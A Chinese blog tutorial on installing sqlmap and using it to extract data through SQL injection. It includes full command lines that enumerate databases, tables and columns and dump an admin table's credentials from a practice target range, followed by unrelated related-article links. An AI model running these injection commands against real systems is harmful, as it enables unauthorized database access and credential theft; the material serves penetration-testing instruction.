SQLMap工具的安装使用
SQLMap工具介绍:
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供将恶意代码注入其中的选项。 它是一种渗透测试工具,可自动检测和利用SQL注入漏洞,在终端中提供其用户界面。该软件在命令行运行,可供不同操作系统下载:Linux发行版,Windows和Mac OS操作系统。 除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据,以及查看表格中的数据,例如用户,密码,备份,电话号码,电子邮件地址,信用卡和其他机密和敏感信息。 sqlmap完全支持多个DBMS,包括MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird和SAP MaxDB。 并全面支持所有注入技术:布尔值,错误,堆栈,时间,联盟。
下载
1.linux下git直接安装
gitclone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
2.Windows下安装
Windows下进入官网http://sqlmap.org/下载安装包解压缩就可以使用。但需要python2.7.x或者2.6.x环境支持。
3.kali及PentestBox默认安装sqlmap
基础语法
sqlmap.py -u “注入地址” --dbs // 列举数据库
sqlmap.py -u “注入地址” --current--db // 当前数据库
sqlmap.py -u “注入地址” --users // 列数据库用户
sqlmap.py -u “注入地址” --current--user // 当前用户
sqlmap.py -u “注入地址” --tables -D “数据库” // 列举数据库的表名
sqlmap.py -u “注入地址” --columns -T “表名” -D “数据库” // 获取表的列名
sqlmap.py -u “注入地址” --dump -C “列名字” -T “表名字” -D “数据库” //获取数据库下表的列信息
打开SQLMap
今天我们环境使用的是Windows 10家庭中文版操作系统和Python 2.7.13由于本机Python环境已经搭建好,所以就不进行演示。接下来我们打开SQLMap:
可以进入本地SQLMAp的目录下,在搜索框输入cmd,然后按回车进入,如图所示:


也可以右击SQLMap文件夹下的sqlmap.py文件创建快捷方式,右键选择属性,修改目标为%windir%\system32\cmd.exe

确定保存

点击快捷方式直接打开SQLMap,可以验证一下

将SQLMap快捷方式添加到launchy快捷打开

SQLMap的使用
在网上找到了一个练习SQL注入的靶场,http://120.203.13.75:6815/?id=1,这道题是要我们通过sql注入拿到管理员密码!

使用F12查看页面cookie,发现页面并没有设置cookie,下面使用SQLMap

查看数据库sqlmap.py -u "http://120.203.13.75:6815/?id=1" --batch --dbs


查看当前使用的数据库,sqlmap.py -u "http://120.203.13.75:6815/?id=1" --batch --current-db


接下来试一下直接爆出maoshe数据库的用户名、和密码。sqlmap.py -u "http://120.203.13.75:6815/?id=1" --batch --users --passwords,但是并没有成功,原因可能是因为DBMS当前用户对相关系统数据库表没有读取权限


查看数据库“maoshe”中的表 ,sqlmap.py -u "http://120.203.13.75:6815/?id=1" --batch -D maoshe --tables,看到了一个名字为admin的表


查看admin表中的列名sqlmap.py -u "http://120.203.13.75:6815/?id=1" --batch -D maoshe -T admin --columns,发现是储存用户信息的表


查看username和password列信息sqlmap.py -u "http://120.203.13.75:6815/?id=1" --dump -C "password,username" -T admin -D "maoshe",爆出admin管理员用户信息而且密码使用明文保存的


SQLMap工具的安装使用的更多相关文章
- 微软源代码管理工具TFS2013安装与使用详细图文教程(Vs2013)
这篇文章联合软件小编主要介绍了微软源代码管理工具TFS2013安装与使用图文教程,本文详细的给出了TFS2013的安装配置过程.使用教程,需要的朋友可以参考下 最近公司新开发一个项目要用微软的TFS2 ...
- [转] 微软源代码管理工具TFS2013安装与使用详细图文教程(Vs2013)
这篇文章联合软件小编主要介绍了微软源代码管理工具TFS2013安装与使用图文教程,本文详细的给出了TFS2013的安装配置过程.使用教程,需要的朋友可以参考下 最近公司新开发一个项目要用微软的TFS2 ...
- nmon工具的安装及简单使用
1.工具的安装 下载rpm包安装即可http://mirror.ghettoforge.org/distributions/gf/el/6/gf/x86_64/nmon-14i-1.gf.el6.x8 ...
- PHP性能优化工具–xhprof安装
PHP性能优化工具–xhprof安装,这里我先贴出大致的步骤: 1.获取xhprof 2.编译前预处理 3.编译安装 4.配置php.ini 5.查看运行结果 那么下面我们开始安装xhprof工具吧: ...
- PHP 代码质量检测工具的安装与使用
代码统计工具 PHPLOC安装:wget https://phar.phpunit.de/phploc.phar chmod +x phploc.phar sudo mv phploc.phar /u ...
- Hadoop集群中pig工具的安装过程记录
在Hadoop环境中安装了pig工具,安装过程中碰到了一些问题,在此做一下记录: 主要安装流程参考:http://www.cnblogs.com/yanghuahui/p/3768270.html ...
- 第一章:绪论-Python开发工具的安装
书中提到了操作系统平台尽量选 *nix.我这里选用的是 ubuntu 14.04 , 下面的操作均以此操作系统为例说明. 操作系统安装教程可以去网站上找,推荐用虚拟机的方式,Windows下可用的虚拟 ...
- 微软源代码管理工具TFS2013安装与使用图文教程
微软源代码管理工具TFS2013安装与使用图文教程 这篇文章主要介绍了微软源代码管理工具TFS2013安装与使用图文教程,本文详细的给出了TFS2013的安装配置过程.使用教程,需要的朋友可以参考下 ...
- [转]linux下iftop工具的安装与使用详解(图文)——实时的网络流量,监控TCP/IP连接(单机)
原文链接:http://www.jbxue.com/LINUXjishu/10735.html 在linux中监控系统资源.进程.内存占用等信息,可以使用top命令.查看网络状态可以使用netstat ...
随机推荐
- Ingenious Lottery Tickets 【排序】
问题 I: Ingenious Lottery Tickets 时间限制: 1 Sec 内存限制: 128 MB 提交: 590 解决: 135 [提交] [状态] [命题人:admin] 题目描 ...
- 《温故而知新》JAVA基础四
类的封装 定义:将类的一些信息隐藏起来,不允许外部的程序直接的访问,而是通过该类提供的一些方法来获取 好处:只能通过特定的法方法访问数据,保护了数据, 实现封装的步骤: 修改属性的可见性:(一般类属性 ...
- Fastjson-fastjson中$ref对象重复引用问题
当你有城市数据,你需要按国内.国际.热门城市分成数组的形式给出并输出为json格式. 第一个问题,你的数据格式,需要按字母类别划分,比如: "int": { "C&quo ...
- mapping values are not allowed in this context at line 115 column 10
/opt/vagrant/embedded/lib/ruby//psych.rb::in `parse': (<unknown>): mapping values are not allo ...
- windows service 2008 R2 安装net4.6环境失败,windows service 2008 R2 升级sp1问题
一.错误 1.因为我的程序是以vs2017开发的,在windows service 2008 R2 IIS部署项目文件报出错误,因此要安装net4.6的环境. 2.windows service 2 ...
- 一个简单CI/CD流程的思考
因为公司有两地研发团队,在统一CI/CD上难度不亚于两家公司合并后的新流程建立,并非不可攻克,简单描述下心得. 首先,代码管理使用gerrit -> 因其强大的 codereview 功能被选中 ...
- [la P5031&hdu P3726] Graph and Queries
[la P5031&hdu P3726] Graph and Queries Time Limit: 10000/5000 MS (Java/Others) Memory Limit: ...
- 解決 centos -bash: vim: command not found
i. 那么如何安裝 vim 呢?输入rpm -qa|grep vim 命令, 如果 vim 已经正确安裝,会返回下面的三行代码: root@server1 [~]# rpm -qa|grep vim ...
- PDF 补丁丁 0.6.0.3282 版发布(修复内存漏洞)
补丁丁的新测试版修复了旧版在导出图片.分析文件结构时的内存漏洞. 对于希望表达对本软件感情的用户,可点击“帮助”菜单的“关于本程序及作者”命令,用微信扫描里面的二维码表达您的谢意. 新的测试版正在制作 ...
- 2.6 利用FTP上传所有文件
利用FTP上传所有文件 import os,ftptools class UploadAll(ftptools.FtpTools): #继承上一篇写的Ftptools '''upload an ent ...